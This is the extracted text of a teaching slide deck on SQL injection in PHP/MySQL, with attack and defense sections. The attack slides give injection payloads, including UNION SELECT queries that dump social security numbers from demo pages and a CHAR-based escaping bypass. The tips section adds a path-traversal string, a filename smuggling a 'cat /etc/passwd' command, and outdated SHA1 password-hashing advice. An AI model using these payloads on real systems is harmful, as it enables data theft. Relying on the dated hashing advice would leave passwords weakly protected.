SQL Injection Who Am I? Sean Taylor Computer Science major Software developer Web developer Amateur hacker Who I Work For Streaming Media Hosting, Inc. Currently looking for a Senior Network and System Administrator - contact firstname.lastname@example.org for more information. Software Used PHP 5 MySQL 5 Apache 2 Vim (it‟s better than Emacs) What is SQL Injection? What is SQL Injection? Not a software flaw Arises with concatenation of dynamic queries Can be performed on anything using an SQL-based language, such as MySQL, PostgreSQL, MS-SQL, and others. What is SQL Injection? $query = “SELECT * FROM my_table WHERE id = $_GET[„id‟]”; What is SQL Injection? Attack Techniques Attack Techniques Testing for injectable variables Toss in an apostrophe („) Mess with integers Throw in an always-true statement Attack Techniques Throwing in apostrophes files.php?id=„ SELECT * FROM my_table WHERE id = „ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Attack Techniques Messing with integers files.php?id=1%20hello%20world! SELECT * FROM my_table WHERE id = 1 hello world! You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‟hello world!' at line 1 Attack Techniques Always True Statements files.php?id=2%20OR%201=1%20--%20 SELECT * FROM my_table WHERE id = 2 OR 1=1 -- AND … Returns everything in my_table. Attack Techniques The UNION keyword If you have a laptop with you, point yourself to http://www.technotaylor.net/secure/example1.php?showall=yes Attack Techniques The UNION keyword …?showall=no' UNION SELECT social FROM social_securities --%20 Returns: quote in database: 111-11-1111 222-22-2222 333-33-3333 444-44-4444 555-55-5555 666-66-6666 Attack Techniques SELECT AS http://www.technotaylor.net/secure/example2.php Attack Techniques SELECT AS …?id=30 UNION SELECT social AS quote FROM social_securities --%20 Returns: 111-11-1111 Attack Techniques Multi-return vs. Single return Obviously can‟t perform SELECT * How do we get around this for multiple values in a SELECT statement? Attack Techniques Boolean operators can be performed practically everywhere … FROM social_securities WHERE social > „111-11-1111‟ --%20 Returns: 222-22-2222 Defense Techniques Defense Techniques Escaping quotes are not enough addslashes() and mysql_escape_string() in PHP won‟t save you! http://www.technotaylor.net/secure/example3.php Defense Techniques C-String Attack Replace any string in your injection query with a CONCAT of CHARs … SELECT FROM social_securities WHERE social > CONCAT(CHAR(49), CHAR(49), CHAR(49), CHAR(45)…) --%20 Returns: 222-22-2222 Defense Techniques Take advantage of on-the-fly conversions Some databases, like MySQL, do on-the- fly conversions. For example, a string can be converted easily to an integer on the fly and vice-versa without needing to strictly cast. When strings are properly escaped, there is no breaking out of them. Defense Techniques Cast your variables at the software layer PHP has a function called settype(), so you can be sure that if you‟ve received a string it will always be an int Defense Techniques If you have a pre-determined set of inputs, use them to your advantage. If you know the values are going to be “red”, “blue”, or “green”, create a switch- case declaration to verify the variables and dump anything else that comes in as invalid Defense Techniques If you have a pre-determined length of input, limit the input length at the software layer If you only have input that‟s 1-8, limit the length of the input to simply one character. Defense Techniques Use prepared statements when possible PHP comes with an awesome SQL security suite called PearDB Defense Techniques If prepared statements aren‟t a possible solution, use SQL libraries built for this purpose SafeSQL http://www.phpinsider.com/php/code/SafeSQL/ StrictDB http://www.technotaylor.net/strictdb/ General Security Tips General Security Tips PHP specific Never, ever, ever, EVER use eval() Don‟t use $_REQUEST -- use $_GET, $_POST and $_COOKIE instead. Turn off magic_quotes_gpc-- they‟re useless and annoying. Add “php_flag magic_quotes_gpc off” to your .htaccess file If you‟re not debugging, turn off error reporting with error_reporting(0) General Security Tips Cross-site scripting (aka XSS) Problem: user can put in HTML tags Solution: strip and replace all HTML-specific characters & => & “ => " „ => ' < => < > => > PHP has a function that does this for you-- htmlspecialchars(“string goes here”); General Security Tips Directory traversal Problem: input argument is a file to be read on the server. Solution: don‟t do that because it is very stupid. If someone puts in an argument for the file called “../../../etc/passwd”, congratulations, you‟ve compromised your server by showing off the password file! General Security Tips File uploads MIME types are never to be trusted. Neither are file extensions. To verify a file‟s actual type, you may have to go as far as open the file and inspect its header information! Beware how you handle filenames: browsers can be manipulated to send malicious file extensions, such as “my_picture.jpg; cat ../../../etc/passwd” General Security Tips Password storing Don‟t use two-way encryption MD5 has been broken-- use SHA1 Don‟t forget to salt your hashes! General Security Tips Salting your hashes Salting is appending or prepending an incoming a password with an 8-16 string of random characters and hashing the result. Salting keeps people from performing dictionary attacks on your database. http://www.technotaylor.net/secure/example4.php?showall=yes General Security Tips An SQL-injected dictionary hash-attack …?showall=no‟ UNION SELECT username FROM users WHERE hash = (SELECT hash FROM users WHERE username = 'CRASH_OVERRIDE') AND NOT username = 'CRASH_OVERRIDE' --%20 Returns: registered users in database: bob steve bill More Information More Information Good „ol Wikipedia http://en.wikipedia.org/wiki/SQL_injection Toorcon presentation on SQL injection http://video.google.com/videoplay?docid=5773019 873031992689 PHP Security whitepaper http://www.acunetix.com/websitesecurity/php_whit epaper.pdf The End You have just lost The Game.